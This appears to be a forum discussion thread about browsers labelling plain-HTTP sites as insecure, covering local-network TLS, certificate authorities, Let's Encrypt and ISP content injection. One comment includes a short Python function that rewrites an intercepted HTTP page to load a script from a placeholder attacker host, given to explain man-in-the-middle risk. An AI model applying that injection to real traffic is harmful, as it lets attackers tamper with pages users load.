Ah, the fridge-as-a-service model. Instead of buying something that just works for decades, you now get to pay service fees to keep some remote server online. Oh wait, the company just went under and nobody can host trusted replacement servers; guess I need a new fridge.
Right, any software that's hooked up to the internet needs to be updated over time to stay secure, so you either pay for a service or it goes insecure in 2 years.
Accessing a network-connected TV or other home gadget is also "using a local server", do you really suggest people should not do this without a networking professional? That's just not going to happen.
Of course that's going to happen. It's just too dangerous to let someone without the right qualifications do it. I expect it to become a legal requirement to have a licensed technician install networks just like it is with electricity or gas.
The internet is just too important to leave to amateurs, look at how much damage badly configured home networks and computers are causing already. This stuff needs to be secured properly.
You also didn't need a driver's license when cars first became available, but now there are shitloads of cars, so we have to make sure drivers are capable before letting them drive. Same goes for network-connected equipment.
Also, being part of a botnet should directly impact your internet bill. I don't really see another option. It's a bit silly that nobody knows when their devices are saturating their bandwidth 24/7 because they are compromised.
That way people are then motivated to hire a professional. Also, people making devices will be motivated to not use a default "admin" password because customers will start saying "uh, this smart toaster cost me hundreds of dollars when I plugged it in."
Automate what, exactly? The point is most home users access their router via 192.168.0.1; they don't have a domain name, nor are they likely to want to buy one. This is no longer a niche thing that a few people want to do; it's hundreds of millions (if not a billion) of households needing to do this just to access their own router without it saying "not secure".
A ridiculous proposition given the current state of technology? Also yes.
If it happens, implemented in turnkey devices (such as SOHO routers) in a way that enhances vendor control rather than empowering home users with the option to use their own domain names and certs? Likely, that's the trend these days and doesn't show signs of receding.
The last line is kinda a tangent, but if that came to be the case, I would no longer be on board with the idea every device should have a FQDN.
You are deluding your users if you convey the idea that home networks are separated from the internet, or that traffic on a home network is safe and doesn't need TLS. Can't you just put up a domain and give your users subdomains on it?
Already thought about this. But a) the application does not require any internet connection, and b) while it is possible to just get a global domain name and redirect it locally to the local server, this would require my server to hijack all DNS requests in the local network, which I don't want to do. And I don't want users having to set up DNS redirects themselves.
Edit: And don't get me wrong, I'm totally for TLS on the local network; but there should be an easy way for users to permanently mark self-signed certificates from a local address as secure.
There would be no hijacking involved, just give each of your users a normal unique subdomain that you serve from the DNS. As in, user-1.yourapp.net, user-2.yourapp.net etc.
If someone wants to run it in a network with no access to the DNS, you can just tell them to put that in their hosts file (or whatever local DNS setup they are using).
> there should be an easy way for users to permanently mark self-signed certificates from a local address as secure.
I'm not sure I agree that that's where the UX needs improvement. Microsoft already has a pretty "easy" solution for pushing locally trusted CA certs, but only in an "enterprise" environment.
Most/all Linux distros will allow pushing to /etc/ssl/certs/ca-certificates (via e.g. /usr/local/share/ca-certificates and update-ca-certificates).
But that doesn't help as long as browsers work hard to be "special", and manage their own trust.
Being able to mark some nets as trusted/local might help - both with ::1 and with VPNs.
In order to be assured of something's identity, it needs an actual identity to be assured of. For things on the network, this will usually be a DNS name, so we should give them a DNS name.
You don't need to buy "domains", but certainly for a commercial project that makes loads of things which need names it would make sense to own a sub-domain to put all the names in.
You also don't need to "connect to the internet just for DNS lookup" unless you really want to. The point of using DNS names isn't that you can look them up in DNS; it's that they're a unique hierarchy with a central authority.
There _are_ alternatives to DNS names but none of them have a trustworthy and working PKI today so you can't use them to secure anything you build. Maybe building a trustworthy PKI is hard?
If you insist upon using Let's Encrypt (which is a charitable purpose and so charges $0 for certificates), perhaps because it's actually a hobby project, then yes, somebody would need to control DNS records in order to periodically prove control over each name and get issued a certificate, because that's how ACME (the protocol Let's Encrypt uses) decides whether to issue.
Many other public CAs are for-profit companies and several already have _active_ commercial deals in which they issue certificates for devices in bulk to the name owner. If you're EXA Metal Poles Europe and you're making 50 000 devices named in the range pole0000.foo.example.com through poleFFFF.foo.example.com they are quite happy to issue you, the legitimate owners of example.com with 50 000 certificates for those devices in exchange for money.
At some level, a certificate is an identity. If I’ve trusted a cert, then I know that anyone using it has the private key, no matter their IP or DNS name. Being able to do that for a local device would be very nice—I could connect to whatever IP it DHCP-ed to and be sure I was talking to the right thing.
That deserves a hard stare. If I trust the certificate on my chat server to be _the certificate for my chat server_ that doesn't suddenly make it OK to present that certificate if you're claiming to be my bank, or my operating system vendor, or Hacker News.
The local device should have a _name_ and then we can issue it a certificate for that _name_ and know we're really talking to the same thing as last time. DHCP and other address allocation protocols don't (needn't) change the name.
I think we should just take the same approach that I2P and Tor take for naming, and base the domain name on the public key. Local devices automatically get a domain like gmaf2cgbn3q2be3vaaytrev3qyxcksemkdxtzefq5bl3542uyf3q.local, which they can advertise via mDNS, and the browser accepts a self-signed certificate for a public key which matches this fingerprint just as if it were "domain validated".
The domain stays the same so long as the key does, so the user can bookmark the page for their own device and be sure that when they navigate back to that domain they're getting the same device and not some imposter—effectively making this equivalent to "trust on first use".
Edit: Changed "on the certificate" to "on the public key". It might be necessary to regenerate the certificate periodically, e.g. to update the expiration date, and that shouldn't affect the domain name.
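A minimal sketch of the derivation (assuming SHA-256 and base32, which happens to yield 52-character labels like the one above; the key bytes here are a stand-in for the device's real public key):

```python
import base64
import hashlib

def key_domain(public_key: bytes) -> str:
    """Derive a stable, self-certifying .local name from a public key."""
    digest = hashlib.sha256(public_key).digest()
    # 32-byte digest -> 52 base32 characters once padding is stripped
    label = base64.b32encode(digest).decode().rstrip("=").lower()
    return f"{label}.local"

# Same key -> same domain, so a bookmark keeps pointing at the same device;
# an imposter with a different key necessarily lands on a different domain.
print(key_domain(b"device public key bytes (placeholder)"))
```

The browser-side check would then just be: hash the public key in the presented self-signed certificate and compare it against the domain label, which is exactly the trust-on-first-use property described above.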
Yes, there already is an exception for localhost. HTTP on localhost is considered a "secure context".
Edit: To be more precise, and to quote [1]
"Secure Contexts says UAs MAY treat localhost as a secure context only if they can guarantee it will only ever resolve to a loopback address (and are in any case not required to). https://w3c.github.io/webappsec-secure-contexts/#localhost"
You also could stop misusing the browser as an application frontend, and write a proper frontend with a cross-platform toolkit, and distribute that.
I don't understand why developers so often choose the browser as a frontend. Are there better rationales besides having at least some frontend for tyrant-controlled devices like iOS'es, and just using the skills one already has?
For the first, just tell the people to get proper devices.
Because of the second, I see schooling efforts for JavaScript by the tech giants so negatively. It leads to masses of people using JavaScript where it shouldn't be.
Perhaps you don’t remember back to the days before the browser was used for application front ends. The problem was no one wrote the front end on some “nice cross platform toolkit”. Instead everything was some crappy windows only app and Linux and Mac users were left out in the cold. Give me the browser any day.
If there was another way to ship an application that can be accessed in one click, in less than a second, with shareable urls, I'd be interested.
Other nice things to see: multiple independent open source implementations of the application platform; a stable and battle tested sandbox, such that users can run code from hundreds of different vendors every day without much worry about being pwned.
The web is old and hoary, but to me there isn't any comparison. For most apps I build, the second place choice isn't even close.
An incredibly obvious reason would be that it is the largest application delivery platform with the highest level of user familiarity and comfort.
If you compare two services where one of them offers you a direct login to the app and the other offers you a 200MB download, most people will choose to log in to a website. It's a better user experience. Especially for things that will see infrequent use.
If you _only_ care about the number of users, then I see a point. However, at least for non-commercial programs, why care at all about the number of users?
The scenario you are drawing is not a proper comparison. There is no reason why a native toolkit couldn't support rendering the program before it's fully loaded, so I see no reason a native program would need more data transfer upfront than a JavaScript one. Though I think too that being prompted to download the program, then install it and find the way to run it can be cumbersome, but the solution to this is to not do it this way. Why not integrate with the native way to obtain applications and make it transparent and convenient for the user?
After all, I think there might be fundamentally different goals when developing software, and that explains the difference. If one has accepted advertisement-based financing of projects, then they and I would probably disagree in many ways. I think users' devices must only and exclusively work for the user.
>You also could stop misusing the browser as an application frontend, and write a proper frontend with a cross-platform toolkit, and distribute that.
This is pure insanity. There are tons of applications built on the web stack now that are supposed to run on local networks. There has never been a requirement that "Network == Internet".
For example, enterprise software. Dynamics CRM? Dynamics NAV? Dynamics... anything? Sage CRM? Everything runs on the browser now.
Why would anyone pass up a gigantic, proven, powerful software stack that represents >90% of all applications in the world?
The error is in the stack, not that people would want to use the easiest, most powerful tool for the job.
We might as well be advocating to go back to FoxPro.
>For the first, just tell the people to get proper devices.
It must be super nice to live in a world where you can dictate what devices your clients use, as opposed to inheriting a huge installed base of pre-existing devices, or devices users bring from home.
Whatever job you've got, I want it. Because it's completely alien to my career experience.
I think it can be summed up in one old but very relevant-in-our-times quote: "Those who give up freedom for security deserve neither."
At first, the idea that something is being done "for your safety and security" sounds good, but like all utopian goals, it has deeper connotations that are truly dystopian.
As mentioned in another of the comments here, this is yet another instance of companies using the "more secure" argument to gain control over the masses and ostracise anything they don't like. They're harnessing fear and exploiting it to their advantage.
To give a real-world analogy: we don't lock ourselves in bulletproof cages and expend great effort hiding from others (for the most part), and I'm sure that if your car's GPS flagged high-crime locations as "not safe" and prevented you from going there, there would be much outrage. We shouldn't let companies and governments (and we try very hard, unfortunately not always successfully) dictate every detail of how we live our lives offline, and the same should apply online.
There's a very long tail of sites, many sadly disappearing from Google[1], of old yet extremely useful information, which are probably going to stay HTTP for the foreseeable future. I made a comment about this in a previous "HTTP/S debate" article:
You have javascript disabled. I do not. I happen to use plenty of sites that require javascript, with HN being one of them. Most of the users out there do not have javascript disabled either. How do you account for their security?
> and I'm sure if your car's GPS indicated locations with high crime rates as "not safe" and prevented you from going there, there would be much outrage.
This is just a warning though, no one is preventing you from "going there", it's merely a warning that it might not be safe. Your analogy is more similar to "there's a slow down on that road, let me navigate you somewhere else, but feel free to go there if you want". You have exactly the same amount of freedom.
How exactly is using HTTPS "gaining control over the masses"? Google does not control the HTTPS infrastructure.
It's not like those sites are gone either. There's always archive.org.
The irony of (mis)quoting "Those who would give up essential Liberty, to purchase a little temporary Safety, deserve neither Liberty nor Safety" in the same breath as saying "And I have JS off by default" is definitely worth pointing out here
Indeed. I, the user, get to choose whether to allow JS or not.
Now consider that things like Meltdown and Spectre have JavaScript PoCs
If this was instead 'Chrome 68 will mark all JS-using sites as "not secure"', I wouldn't want that warning either, but then I'd be in agreement with the majority...
Right back at you. How is buying an iPhone over an Android giving up essential liberty? I always have the right to sell it, go to the store, and buy a device that lets me do whatever I want.
Except browsers today are continuously developed, often with larger strategies in mind. Google has stated very openly that their ideal state is a world where there is no insecure HTTP at all and they intend to move everything as close as possible to that state. To reach this, the browser behavior is slowly tightened over a long number of releases.
So a better analogy would be a carmaker announcing that they don't want people to drive to unsafe areas. They'll monitor people's driving behavior via telemetry and OTA-update the car's software accordingly to nudge people's behavior closer to that goal.
So the warning would probably be the first step. Driving to unsafe areas will still be technically possible but it will become progressively more cumbersome until you just give up.
I think that imposing decisions on others for their own good is a dangerous path to take. You stop treating them as adults capable of making rational decisions and start treating them as children that need to be shown the light, by authority and force if necessary. The enlightened technological elite thinks that HTTPS is better, so they have decided to impose that decision on everyone else.
It should always be a choice. If something is insecure, show a warning, in big red bold letters if you have to, but leave the freedom of choice to the end user. But here, what do we have? Many newer JavaScript, HTML, or HTTP features are restricted to HTTPS. Even things like Brotli stream compression, which has no security implications. This is done only to coerce people into using HTTPS.
Flash was a proprietary non-mobile-friendly technology from the start until its demise at the hands of its creators. No heavy-handed dictatorship, just bad products dying, and products that unfortunately depended on them died along with them.
I think your last statement highlights the real issue here. Everyone is afraid of malicious javascript. I don't know why they're conflating that with http injection.
The most straightforward thing to do would be to disable javascript on non https sites by default or warn if a nonhttps site has javascript. Most of the old sites we want to keep around don't have javascript in them (or much javascript in them).
Ideally people should only be enabling javascript on sites they trust (and are running https for "real" "trust") but having a trusted whitelist for enabling javascript brings back your big brother arguments.
It's not just javascript though: we've seen ISPs (and other malicious actors on the network) inject ads, or even place the entire HTML content of the site into an iframe.
This is a malware injection problem and it should be possible for google to create signatures of JavaScript from different websites and have chrome verify it and block it.
Penalizing all http users is heavy handed and google should not go down that path.
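Something close to this already exists in browsers as Subresource Integrity (SRI): the page embeds a hash of each script, and the browser refuses to run a fetched script that doesn't match. A minimal sketch of computing an SRI value (the example script content is made up):

```python
import base64
import hashlib

def sri_value(script_bytes: bytes) -> str:
    """Compute a Subresource Integrity value (sha384 is the common choice)."""
    digest = hashlib.sha384(script_bytes).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")

# The resulting value goes into the script tag's integrity attribute:
#   <script src="app.js" integrity="sha384-..." crossorigin="anonymous"></script>
print(sri_value(b"console.log('hello');"))
```

The catch is that SRI only protects sub-resources: over plain HTTP, the HTML page carrying the integrity attributes can itself be rewritten in transit, so the scheme still leans on HTTPS for the top-level document.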
When a highway is plagued by bandits, the government must go after the bandits and put them away, not close the highway or turn it into a cramped tunnel of armoured steel with only one narrow lane.
I'm saying that instead of doing away with plain-text protocols, maybe national governments could each regulate their ISPs to stop injecting content into the bits they transmit? That would go a long way towards increasing privacy. As for bad state (sponsored) actors, I doubt HTTPS can really stop them from doing what they want, especially not the big ones.
> maybe national govts can each regulate their ISPs to stop injecting content into the bits they transmit?
Good one. Next you'll be telling me that those very same companies don't spend billions on getting the laws written the way they want.
Sure you could try the top down approach where everyone has the best intentions but that's not going to happen, in the meantime I'm installing bulletproof windows in my car.
Some Javascript, HTML or HTTP features are available on HTTPS only. Even things like Brotli stream compression which have no security implications. So some liberty is definitely taken from users who wish to use insecure connections for whatever reason.
> I think it can be summed up in one old but very relevant-in-our-times quote: "Those who give up freedom for security deserve neither."
Now if you could explain to me how using secure connections and showing a correct warning for insecure connections is restricting your freedom that'd be interesting.
My ISP offers security certificates for $145 more than I currently pay per year. The result is that I'll have to pay up, or face a drop off in traffic for my sites from people who will be too scared to view them because of this new browser-based warning... My sites are all public information, no secure data is displayed on them, and there are no user accounts beyond those of my team's editing accounts. It would be sort of overkill to require HTTPS on them.
Cloud hosting is much more expensive than my current hosting plan. It seems like this is also highly convenient for ISPs that http will be phased out because either way, ISPs make a lot more money out of web site business by the newly required standard.
This is the future we knew was coming, where it becomes so expensive for individuals to do the same as companies do. It's how Radio, TV, and many other things were taken away over the years, it simply became too much of a legal hurdle and way too expensive to run until large companies became the only channel owners.
It's just history repeating itself, but now to shut out individual web site and application makers who don't have resources to compete with big business. :\
> Now consider that things like Meltdown and Spectre have JavaScript PoCs. How is this controversial?
Please explain to me how Javascript delivered from a malicious ad delivered over HTTPS is somehow safer. Most malicious code is delivered with the help of the website.
I would have nothing against it if browsers just disabled JavaScript on plain-HTTP web sites. I do that anyway by default, enabling it on domains where it serves some useful purpose. Treating non-HTTPS content as untrusted makes absolute sense (though I don't think HTTPS really makes https://random.l33t.site/ a trusted source of anything).
The old simple plain-HTTP plain-HTML web is still useful and practical for showing text (don't care much even about CSS - HTML 3.2 is perfectly suitable for showing readable information). It seems to become a victim of collateral damage in the pursuit of "better web", which is sad.
My only concern is that the end user can always control which Certificate Authorities his/her browser accepts, and that anyone can set up their own CA. It seems like both of these conditions are vital for the future of decentralized web.
People who cheer for tons of stupid fucking HTTP warnings all over the place really bug me to be honest. Anyone who uses the web needs to be taught the difference between a secure and insecure connection and told where to look for signs (this assumes we burn stupid shit browsers that look to mangle URL bar by removing data from it).
The grandma will not make a better decision if you put up another dumb warning like this one https://i.imgur.com/rxmyWtF.png to waste more and more of my time when I enter my password on the same website over and over. I KNOW IT'S INSECURE, JUST STFU already.
I'm at the point where I will look into building my browsers from source after removing that shit (along with restoring the ability to add certificate exceptions in certain situations). Good thing they're open source.
I don't get how so many people miss the point here, but alas.
It's actually not so complicated: obviously, there's nothing actionable for the user to do here. The message is for the user, but only indirectly: it's there to push developers into better practices. Your boss may not care about encryption or privacy, but definitely will care about hundreds of phone calls asking why they are warned that the form is insecure when they try to login.
With plenty of obscure pages accepting everything from passwords to credit card numbers on plain HTTP pages, this is important. There may not be someone browsing the page knowledgeable enough to catch this, but if any end user can know what they're doing is wrong, then it's much more likely it will be discovered.
While mostly not actionable directly for users, one thing a user can, and probably should, do is close the page, if they can.
It's actually not so complicated: obviously, there's nothing actionable for the user to do here. The message is for the user, but only indirectly: it's there to push developers into better practices
So it's the online equivalent of plastering "Warning: Contains chemicals known to the State of California to cause cancer" all over everything from gas pumps to gerbils.
Even if cancer rates were more or less completely uncorrelated to the presence and/or usage of those products? Congratulations, you've raised the social noise floor for no good reason.
Except it works. If it makes you mad, imagine how many other people it makes angry. And aside from recompiling your browser, all you can do is fix the problem and make the browsers happy.
This is the issue with all systems that use human-friendly naming because someone is in the authority to do the name resolution. This battle was lost when DNS came along.
Not everybody wants to use public keys to refer to everything - even if it is via QR codes.
> this assumes we burn stupid shit browsers that look to mangle URL bar by removing data from it
That's just about every browser now. I think that full URLs are only available in Firefox, and only if you set `browser.urlbar.trimURLs` to `false` in about:config. Hiding URL information is a very bad trend.
As it is implemented now, the indicator shows the http part of the URL in a way that conveys its meaning much better to average users. If it were to stay that way, I would be fine with it. But if past performance is any indicator, this will be just the first step on a spiral of ever more warnings. If browser vendors aren't careful, they'll flood users with so many warnings that users learn to ignore them entirely.
But they are being careful. This rollout has been taking place slowly over the last two years, and continues to do so.
Changes are incremental to give developers a chance to adapt, and to prevent users from getting used to warnings.
HTTP/2 requires https. New APIs have started requiring https. And only forms with passwords or CC inputs will trigger security warnings. These are incremental steps.
I don't know why people think browser vendors haven't considered this stuff before.
Eventually vendors will start deprecating existing APIs to continue the migration towards requiring https. That will put more heat on developers, but only after they've ignored warnings for literal years.
But even the change announced today is only a UI update to the omnibar. It's hardly earth shattering.
Browser vendors are clearly not careful enough. Requiring SSL brings with it a kind of baggage that is ill-suited for tons of use cases. Do not simply assume that all developers ignored these signs out of laziness. They might instead be unable to comply in a useful fashion.
HTTP worked unchanged for close to three decades, and people came to rely on that. Now they are taking crowbars to force it out. This is myopic.
Safari is the worst by default. I don't have any Apple devices, but when I look at screenshots of Safari's URLs, they are not full URLs. Also, it looks like you can't show the full URLs on iPads or iPhones. (You can on Firefox for Android.)
Not a full URL: example.com
Not the full URL: http://example.com (the page will load after completing the URL with a trailing slash)
If this is just a warning, that's one thing. If it becomes a solid block, it means more hassle for everyone running an intranet, and a huge liability for millions of long-lived devices with embedded web servers for browser-based configuration.
Actually, I want a way to turn off the warning on my intranet, because all those printers, sensors, and control units on it are not going to be upgraded. I doubt I can even find HVAC units or sensors with HTTPS support, and nobody will authorize a tens-of-thousands-of-dollars replacement. I do not want a call every time people deal with these devices and get a scary warning. Telling them to ignore it is not going to instill the right attitude for when they go on the internet.
An inappropriate warning is still counterproductive, I agree, but it's in a different league to a solid block.
Not so long ago, I was dealing with the browsers vs. Java applets war, which had a similar effect on many devices as they became progressively harder and ultimately impossible to use. The attitude demonstrated by many defending those browser changes -- as if completely and permanently breaking useful, long-developed, working software on a private network was somehow a good thing -- was somewhere between smug, dismissive and arrogant, and actually quite offensive in some cases.
Developers often wonder why people use iSeries (AS/400) machines. Well, the software is long lived and keeps working. The whole IoT is not going to go forward when the software infrastructure is sand as opposed to stone. I get the feeling if this stuff keeps up, it would be wise for some infrastructure company (e.g. Honeywell) to sponsor an OS specifically for infrastructure with some version of a remote desktop to talk to it. Obviously, web browsers are the wrong way to control long lived devices.
The whole IoT is not going to go forward when the software infrastructure is sand as opposed to stone.
I agree with you about longevity, though I think IoT is mostly a solution in search of a problem anyway, even if the hype train is clearly going to run for a long time yet. Connectivity is obviously useful for some devices, but most of the products I have ever seen in the IoT space weren't IoT to benefit the user, they were IoT to benefit the developer, and they often made the user's experience worse. The other day I visited a friend, and he couldn't change the settings for the lights in his home because his Internet connection was playing up!
Obviously, web browsers are the wrong way to control long lived devices.
There, I will respectfully disagree. Web browsers are, or at least were, a useful way to access devices over well-defined and standardised protocols that were supported on many client devices. They allow UIs much more user-friendly than a command line for non-technical users, and they don't depend on native applications for each client or customised control protocols for each product.
I've built many browser-based UIs for clients over the years with good results, and the only thing that has ever seriously broken them was when browsers started dropping support for useful, long-established functionality -- hence my concern in the current case.
There, I will respectfully disagree. Web browsers are, or at least were, a useful way to access devices over well-defined and standardised protocols that were supported on many client devices.
I think it's the "were" part that's getting me. We had a standardized protocol, HTTP, which is now being phased out, and a whole lot of embedded-systems developers had jumped on it as a control mechanism for their devices. Now we have a crowd of other developers who focus on a different market segment and don't really give a damn about the problems that causes for others. "Move fast and break things" is fine for startups, but not for anything our profession builds into physical things. I'm just a little sick of a disposable culture. I agree HTTPS is a great thing and needed, but putting scary warnings on HTTP that cannot be mitigated is a pain in the butt, because at some point they will remove HTTP entirely.
At this point, I honestly wish the embedded device programmers would jump off the web train and move on to something else.
At this point, I honestly wish the embedded device programmers would jump off the web train and move on to something else.
OK, but what? That's the real question here, surely.
There are very few developments in the history of computing that have been as widely useful and long-lasting as the fundamental web technologies. The fact that certain browser developers are now trying to embrace, extend and extinguish those technologies for their own obvious purposes and without regard to collateral damage just means we need to push back hard against those browser developers. Google is already more powerful than is safe for our industry, and certainly we must not let it become the de facto owner of anything essential.
There are very few developments in the history of computing that have been as widely useful and long-lasting as the fundamental web technologies.
I'm not so sure. All of the web technologies have changed over time. I'm pretty sure only the simplest web pages from the 90's are still functional. There are still computers sold today that can run IBM/360 programs unchanged.
The fact that certain browser developers are now trying to embrace, extend and extinguish those technologies for their own obvious purposes and without regard to collateral damage just means we need to push back hard against those browser developers.
Well, I still think the idea of using a document format as an application format was foolish. Frankly, something like a descendant of QML or even Sun NeWS would have been more appropriate. Heck, even a networked p-machine with a UI would have been better. A frozen subset of HTML might work (we could even use WML and WMLScript, since nobody uses those anymore). I don't think the pushback is going to happen. Instead we end up with a harder development environment than Visual Basic or NeXTSTEP, with less functionality than either.
Google is already more powerful than is safe for our industry, and certainly we must not let it become the de facto owner of anything essential.
No disagreement there. They own the web and can declare your site removed from the internet as far as 90% of web users are concerned.
One might understand an extra-hostile stance against Java applets, having witnessed tortured attempts to keep a vendor's applet running when that applet required a very, very specific (and even then very obsolete) version of Java 1.3 incompatible with some other awful software's requirements. Breaking other, innocent software would have seemed like a pretty fantastic deal, in order to reduce future applet pain.
That was my life a few years ago when Java applets switched from being the best thing since sliced bread to being anathema. Or take ActiveX for another example. Trying to do business with consumer-grade browsers is just one pain point after another.
It’s really an issue, and why am I setting up another server app to fix something that should be a switch for the administrator in software that worked before?
The fact that people want to force HTTPS really bugs me. HTTPS centralizes publication rights with browser vendors and cert vendors. Why should you require permission before publishing content on the web? IMHO, they should rename the S in HTTPS to $.
I believe that Google's intentions here are to block other pass-through internet entities from collecting advertising data. Obviously, Google would never encrypt user data so that they couldn't mine it. Personally, I am more worried about Google mining our data than some rinky dink ISP.
Also, could you link to the PoCs? I have not seen a reliable PoC, but maybe I haven't looked that hard. The ones I've seen only work on specific CPUs, and only if certain preconditions are met. But anyway, that is a separate discussion.
Why is it absurd? So I either have to pay a CA vendor, or I have to ask Lets Encrypt permission to renew my cert every 90 days.
In any case, why should I be forced to support a model where I have to beg for permission to host anything? I believe in stating my opinions and letting others make up their own minds. The opposition believes in forcing everyone to adopt their position by fiat. Why not put the information out there and let people switch to HTTPS if they feel the benefits make sense to them?
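For what it's worth, the 90-day cycle is designed to be automated rather than begged for: a typical deployment (assuming certbot and nginx; the paths and schedule here are illustrative) is a single cron entry, after which renewal never involves a human:

```shell
# /etc/cron.d/certbot -- illustrative; certbot only actually renews
# certificates within 30 days of expiry, so most runs are no-ops
0 */12 * * * root certbot renew --quiet --post-hook "systemctl reload nginx"
```

That automates the mechanics, though it doesn't answer the underlying objection about depending on a third party at all.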
And that's why chrome will mark your site as insecure.
> why should I be forced to [..] beg for permission [..]
That seems to be the best thing humans came up with so far, if you want nice stuff that requires coordination. You also have to "beg" for a connection & ip address. You also have to "beg" for a DNS name. Please propose something better (that doesn't come with its own significant drawbacks).
>And that's why chrome will mark your site as insecure.
That is a false statement. Using 'what could happen' logic, Windows should label Chrome/Firefox/IE as insecure/malware since someone could theoretically do bad things with those tools.
>Please propose something better (that doesn't come with its own significant drawbacks).
Why don't you start first? Since this HTTPS so-called 'solution' has its own significant drawbacks.
You aren't forced to do anything. If you choose to use HTTP, you can, and no one will stop you. The Chrome omnibox will accurately report to users that your site is insecure, if you do, but that's just making them aware of a basic fact.
>The Chrome omnibox will accurately report to users that your site is insecure
What evidence does Chrome have that my site is insecure or poses a threat to users?
'What could happen' logic would mean disabling all browsers since you could get pwned by using any of them. That is not a rational way to approach anything.
> What evidence does Chrome have that my site is insecure
The fact that it is using HTTP, and therefore can be trivially MITMed by anyone controlling any point traversed between you and the client. Communication between the browser and your server is insecure.
Whether that is an important fact to users is a decision users will need to make, but it is a fact.
> 'What could happen' logic would mean disabling all browsers since you could get pwned by using any of them.
Clearly, to the extent that is accurate, that's not the logic at issue since nothing is being disabled here. So, please, stop with the irrelevant strawmen.
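To make "trivially MITMed" concrete: an on-path box sees, and can rewrite, every plain-HTTP response before the browser gets it. The rewriting step itself is nearly a one-liner (a hypothetical sketch; real-world equivalents are the ISP ad injectors mentioned elsewhere in the thread):

```python
def inject_script(html: str, payload_url: str) -> str:
    """Rewrite an intercepted HTTP response body to load an attacker-chosen script."""
    tag = '<script src="%s"></script>' % payload_url
    if "</body>" in html:
        # Slip the payload in just before the closing body tag
        return html.replace("</body>", tag + "</body>", 1)
    return html + tag  # no closing body tag: just append

page = "<html><body><h1>Memes</h1></body></html>"
print(inject_script(page, "http://attacker.example/p.js"))
```

Over HTTPS the same box sees only ciphertext, so this class of rewrite fails regardless of whether the page content itself is sensitive.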
>The fact that it is using HTTP, and therefore can be trivially MITMed by anyone controlling any point traversed between you and the client.
Can you please link to any evidence showing the millions of HTTP sites that were MITMed? After all, it's so trivial, as you claim. OTOH, why would anyone bother, when it's much easier to inject scripts and other potentially harmful stuff via compromised ads, third-party hosted JS, compromised CDNs, etc.? The current proposal fails to address any of those real, tangible 'bad' things that are actually occurring with alarming frequency.
>Communication between the browser and your server is insecure.
That applies to every single piece of data transferred that is not under the control of the domain being visited.
>Clearly, to the extent that is accurate, that's not the logic at issue since nothing is being disabled here. So, please, stop with the irrelevant strawmen.
Simply asserting it doesn't make it so. I reject your interpretation. The most dominant browser vendor showing scary yellow triangles with exclamation marks instead of showing your webpage is exactly like disabling it.
> The most dominant browser vendor showing scrary yellow triangles with exclamation marks, instead of showing your webpage is exactly like disabling it.
No, it's not, and we know it's not, because even the much more forceful click-through warnings used for HTTPS certificate errors (introduced because scary red icons in the address bar failed) still had such a high click-through rate that vendors invented the multistep process, hidden behind an "Advanced" button, that they use now for certificate errors.
And anyway, the UI they've shown is simple light grey "Not Secure" text, not a "scary yellow triangle". It's nothing like blocking, and it's not a failed blocking attempt: from their experience with certificate errors, they know how much it takes to really stop casual web users from proceeding in the face of a security warning.
It's absurd because you're describing it as some sort of money shakedown when 1) Google isn't profiting off of this and 2) you can get certificates for free.
The complaint is not about the cost of the certificate, it's about handing control over availability to someone else.
What you are describing is how things are working for now.
First, there's no guarantee Let's Encrypt will be here tomorrow. You're pinning the future of the Internet onto the shoulders of the maybe a dozen people who run it.
Second, CA's are - by definition - centralized. There's no guarantee that, in principle, you'll always be able to get a certificate for them.
The Internet was designed to be distributed and hard to break. HTTPS-only Internet is going backwards on this.
I'm all for security and privacy, but any solution that requires a centralized third-party for the whole system to function is, in my opinion, broken by design.
There's that, and there's making the system needlessly complicated for many tasks. There are very, very many websites and users (I'd say - the absolute majority) who are OK with the Dangers Of HTTP (that is, some intermediate party being aware that you read a certain webpage). Worrying about that in the age where every step is tracked, every face detected, and every page is full of trackers seems, to me, facetious.
I browse a popular gaming forum that has not implemented HTTPS. Chatting with the admin, the reason is simple: Ads.
We can definitely blame the ad networks. Some have switched, but many won't work on https, and websites relying on ad revenue must stay with HTTP or make less money with HTTPS-friendly ad networks.
This hasn’t been true for at least a year. There is zero difference in ad revenue for HTTP vs HTTPS now. Join any major online community for publishers and ask anyone if you don’t believe me.
>Now consider that things like Meltdown and Spectre have JavaScript PoCs. How is this controversial?
Seems totally irrelevant, since any "legit" site with a $10 certificate will still be able to inject malicious code, either by its operators putting it there directly or by being hacked -- whether there's a man in the middle or not. And with something like Spectre out there, HTTPS won't do anything.
> However, you have to recognize the fact that you run JITed code from these sites.
I guess browsers could then make an effort to help sites use scripts only when absolutely necessary and give users easy to use tools to disable scripting. But, oh wait, they do the exact opposite.
Or users could switch to browsers that disable JavaScript and third-party cookies by default, instead of the ones controlled by advertising and DRM monopolies. But, oh wait, they do the exact opposite.
You don't need HTTPS to verify integrity. HTTPS actually adds attack vectors, complexity, and removes useful functionality like proxies. And like another commenter mentioned, most malware is delivered from an authentic site anyway.
HTTPS evangelists are basically playing a game of political ideology shrouded as concern for safety. I think they care more about their own privacy than they do the functionality, security, and maintenance required for HTTPS sites.
It's also not coincidental that Google has a vested interest in keeping all traffic surrounding their services hidden or obfuscated: traffic content and metadata is money. Google is basically eating the lunch money of ISPs' passive ad revenue. (This is also part of why they want to serve DNS over HTTPS)
How else would you practically verify integrity for web browsing?
What's wrong about caring about your privacy?!
Why the hell do ISPs deserve ad revenue? I don't like Google either, but ISPs that want to tamper with connections to inject their ads can fuck off and die in a fire. That is more unethical than anything Google has ever done.
> How else would you practically verify integrity for web browsing?
Download a signature once, verify any file before rendering it. You could even control this behavior using an HTTP header if you wanted granular control. It would be a trivial extension.
Today, nobody verifies that content was created by the author. That content can be subverted on the web server, and this is how malware is distributed today. Verifying content with a signature would actually be more secure than just TLS.
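The proposal above resembles what Subresource Integrity already does for individual scripts. A minimal sketch of the idea, with hypothetical names (`manifest`, `verify`) and plain SHA-256 digests standing in for a real deployment, which would sign the manifest with the author's private key (e.g. Ed25519) so the manifest itself can't be forged:

```python
import hashlib

# Hypothetical sketch of the scheme described above: the client holds a
# pinned manifest mapping paths to digests, and checks every fetched body
# before rendering it. Real deployments would authenticate the manifest
# with an asymmetric signature; a bare digest stands in here.
manifest = {
    "/index.html": hashlib.sha256(b"<html>hello</html>").hexdigest(),
}

def verify(path: str, body: bytes) -> bool:
    """Accept the body only if it matches the pinned digest for this path."""
    expected = manifest.get(path)
    return expected is not None and hashlib.sha256(body).hexdigest() == expected

assert verify("/index.html", b"<html>hello</html>")
assert not verify("/index.html", b"<script>injected()</script>")
assert not verify("/unknown.html", b"anything")
```

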